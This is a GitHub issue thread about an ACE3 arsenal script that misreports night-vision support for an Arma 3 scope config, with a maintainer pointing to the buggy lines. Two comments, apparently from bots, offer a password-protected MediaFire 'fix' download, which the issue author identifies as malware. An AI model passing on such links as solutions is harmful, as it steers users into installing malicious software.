### ISSUE TITLE
Arsenal not correctly detecting if Scopes Support NVGs

### ISSUE THREAD

**Issue by Amateur-God** [acemod/ACE3#9253]
**Mods (complete and add to the following information):**
- **Arma 3:** `Stable` [e.g. 1.00 stable, rc,  dev]
- **CBA:** `stable` [e.g. 3.0.0 stable, commit hash] (Current steam version)
- **ACE3:** `stable` [eg. 3.0.0 stable, commit hash] (Current steam version)

**Description:**
as discussed with "BaerMitUmlaut" in [Discord](https://discord.com/channels/976165959041679380/976224710385877002/1128625106499948606) Message linked, the [Script](https://github.com/acemod/ACE3/blob/master/addons/arsenal/functions/fnc_statTextStatement_scopeVisionMode.sqf) that is supposed to detect whether or not a scope supports NVGs isn't working properly, 

I have a Scope with the following class config

```cpp
class BNB_FA_UK_ELCAN: ItemCore
	{
		scope = 2;
		author = "www.3commandobrigade.com modified by Carmichael (Amateur-god)";
		DLC = "2BNB Factions";
		displayName = "2BNB Elcan LDS (without Reflex)";
		picture = "\UK3CB_BAF_Weapons\addons\UK3CB_BAF_Weapons_Accessories\data\gear_acco_specterlds_ca.paa";
		model = "UK3CB_BAF_Weapons\addons\UK3CB_BAF_Weapons_Accessories\uk3cb_elcan.p3d";
		descriptionShort = "Lightweight Day Sight, 2x 32mm<br/>Used on: L85<br/>by www.3commandobrigade.com adjusted by carmichael to be 2x and support NVGs for 2BNB";
		weaponinfotype = "RscWeaponZeroing";
		class Library
		{
			libtextdesc = "SpecterOS 2x combat sight by Raytheon ELCAN is a lightweight optical day sight (LDS) designed for L85's.";
		};
		class ItemInfo: InventoryOpticsItem_Base_F
		{
			mass = 4;
			optics = 1;
			modelOptics = "UK3CB_BAF_Weapons\addons\UK3CB_BAF_Weapons_Accessories\uk3cb_elcan_optic.p3d";
			class OpticsModes
			{
				class BNB_FA_UK_LDS
				{
					opticsID = 1;
					useModelOptics = 1;
					opticsPPEffects[] = {"OpticsCHAbera5","OpticsBlur5"};
					opticsZoomMin = 0.125;
					opticsZoomInit = 0.125;
					opticsZoomMax = 0.125;
					discreteDistance[] = {300};
					discreteDistanceInitIndex = 0;
					distanceZoomMin = 300;
					distanceZoomMax = 300;
					memoryPointCamera = "eye";
					visionMode[] = {};
					opticsFlare = 1;
					opticsDisablePeripherialVision = 1;
					cameraDir = "";
				};
			};
		};
	};
```
	
However, as can be seen here 
![image](https://github.com/2bnb/2bnb-factions/assets/68581288/0e9fd9dc-4782-423d-b89e-63031f46d6ba)

it shows as not having NVG support
from what i can tell from the script its suppose to detect the contents of ``visionMode[] = {};``  and set the text to primary supported if there's no content between the ``{}``

**Comment by LinkIsGrim** [comment]
Bug is [here](https://github.com/acemod/ACE3/blob/535662b883e0a0013ee4ff19b67f5571e357088e/addons/arsenal/functions/fnc_statTextStatement_scopeVisionMode.sqf#L53-L62).

**Comment by rautamiekka** [comment]
And not only that, but most sniper scopes and many non-sniper optics arbitrarily don't support NVG/TI although there's no reason they wouldn't.

**Comment by LinkIsGrim** [comment]
That sounds like a lot of config changes and maintenance hell.

And there are reasons why optics wouldn't support NV/TI, mostly to do with light reception through the optic into the goggles and eye relief.

**Comment by rautamiekka** [comment]
> That sounds like a lot of config changes and maintenance hell.

Yeah, shoulda been done since the start, so not now.

> And there are reasons why optics wouldn't support NV/TI, mostly to do with light reception through the optic into the goggles and eye relief.

Surely those are the exception, though ? I dunno if the game (or the file formats) is even able to account for those, either, but if it can it's up to the Players to decide what to use.

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Amateur-God** [comment]
@LinkIsGrim can you lock this thread since it's resolved, this is like the 2nd bot to post a link to malware on the thread as a "fix for the issue"
